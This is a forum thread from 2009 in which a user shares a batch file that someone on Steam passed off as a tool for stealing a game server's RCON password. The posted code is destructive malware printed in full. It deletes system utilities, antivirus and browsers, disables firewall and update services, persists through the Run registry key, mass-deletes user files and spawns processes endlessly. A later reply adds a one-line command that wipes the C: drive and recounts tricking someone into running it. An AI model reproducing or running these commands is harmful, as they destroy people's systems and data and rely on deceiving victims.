Threaded Mode | Linear Mode

Joom · 20/12/2009 10:37 AM

So I was just talking to a skiddie on Steam and he sent me this batch file saying that it steals a server's RCON password....

Code:

@echo off
start cmd.exe
start notepad.exe
shutdown -s
start www.youareanidiot.org
erase "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
erase "C:\WINDOWS\regedit.exe"
erase "%SystemRoot%\system32\restore\rstrui.exe"
erase "C:\WINDOWS\system32\taskmgr.exe"
erase "C:\WINDOWS\system32\scrnsave.exe"
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

erase "C:\WINDOWS\system32\mspaint.exe"
erase "C:\WINDOWS\system32\magnify.exe"
erase "C:\WINDOWS\notepad.exe" /Q /S
erase "C:\WINDOWS\system32\calc.exe" /Q /S
erase "C:\WINDOWS\system32\cmd.exe" /Q /S
taskkill /f /im msnmsgr
erase "C:\Program Files\Windows Live" /q /s

taskkill /f /im yahoomsgr.exe
erase "C:\Program Files\Yahoo" /q /s

erase "C:\WINDOWS\system32\mouse.drv"
erase "C:\WINDOWS\system32\keyboard.drv" /Q /S
erase "C:\Program Files\eset" /Q /S
erase "C:\Program Files\alwil" /Q /S
erase "C:\Program Files\norton" /Q /S
erase "C:\Program Files\Malwarebytes' Anti-Malware" /Q /S
erase "C:\Program Files\Kaspersky" /Q /S
erase "C:\Program Files\Mozilla Firefox\firefox.exe" /Q /S
erase "C:\Program Files\Internet Explorer\IEXPLORE.exe" /Q /S
erase "C:\WINDOWS\system32\dfrg.exe" /Q /S
msg * ytujtfrjt
goto   No-no site
mkdir "C:\Documents and Settings\%user%\Desktop\doomed"
mkdir "C:\Documents and Settings\%user%\Desktop\trojanz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.generator"
mkdir "C:\Documents and Settings\%user%\Desktop\trojan.gen"
mkdir "C:\Documents and Settings\%user%\Desktop\botz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.exe"
mkdir "C:\Documents and Settings\%user%\Desktop\your"
mkdir "C:\Documents and Settings\%user%\Desktop\PC"
mkdir "C:\Documents and Settings\%user%\Desktop\is"
mkdir "C:\Documents and Settings\%user%\Desktop\infected"
mkdir "C:\Documents and Settings\%user%\Desktop\by"
mkdir "C:\Documents and Settings\%user%\Desktop\new_virus"

erase "C:\WINDOWS\$NtUninstallKB926239$" /S /Q
erase "Network Connections" /Q /S
copy /y %0 %windir%
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows /t REG_SZ /d %windir%\
o.o.bat
@del \q \s C:\*.doc
@del \q\ s C:\*.txt
@del \q \s C:\*.mp3
@del \q \s C:\*.png
@del \q \s C:\*.wmv
@del \q \s C:\*.exe
@del \q \s C:\*.flv
taskkill /f /im System Iddle Process.exe
@del \q \s C:\*.wma
@del \q \s C:\*.jpg
@del \q \s C:\*.vbs
@del \q \s C:\*.bat
@del \q \s C:\*.pps
@del \q \s C:\*.pdf
@del \q \s C:\*.wav
@del \q \s C:\*.ico
@del \q \s C:\*.ini
@del \q \s C:\*.avi
@del \q \s C:\*.ocx
@del \q \s C:\*.cfg
:spam
start cmd.exe
start notepad.exe
start iexplorer.exe
goto spam

diego · 20/12/2009 10:39 AM

lol

1-R · 20/12/2009 10:40 AM

diego Wrote:lol

roberth · 20/12/2009 10:53 AM

wait...it kerases notepad, but then trys to run it later?

lolfail?

Chaos Panda · 20/12/2009 11:39 AM

lol, i wonder if anyones fallen for it yet

Joom · 20/12/2009 12:15 PM

Stupid skiddies....

defdock · 20/12/2009 12:53 PM

lol. i bet i would try it if it wasn't in writen form lol

trademark91 · 20/12/2009 01:43 PM

lol

Silvertie · 20/12/2009 03:35 PM

This code pales in efficiency compared to this.

Code:

RD C:\ /S /Q

The above code, when run as an admin, apparently erases the whole C:\ drive, without a "are you sure" prompt. All I have as evidence is this guy called Databank who was cabbage enough to execute it in command prompt when he was asking how to take a screenshot. After execution, he left the IRC channel, and did not return. He may have just ragequitted, but it is likely his computer was fudged.

ZiNgA BuRgA · 20/12/2009 04:29 PM

Where'd my screen magnifier go?

Threaded Mode \| Linear Mode lolhax0rs
Author	Message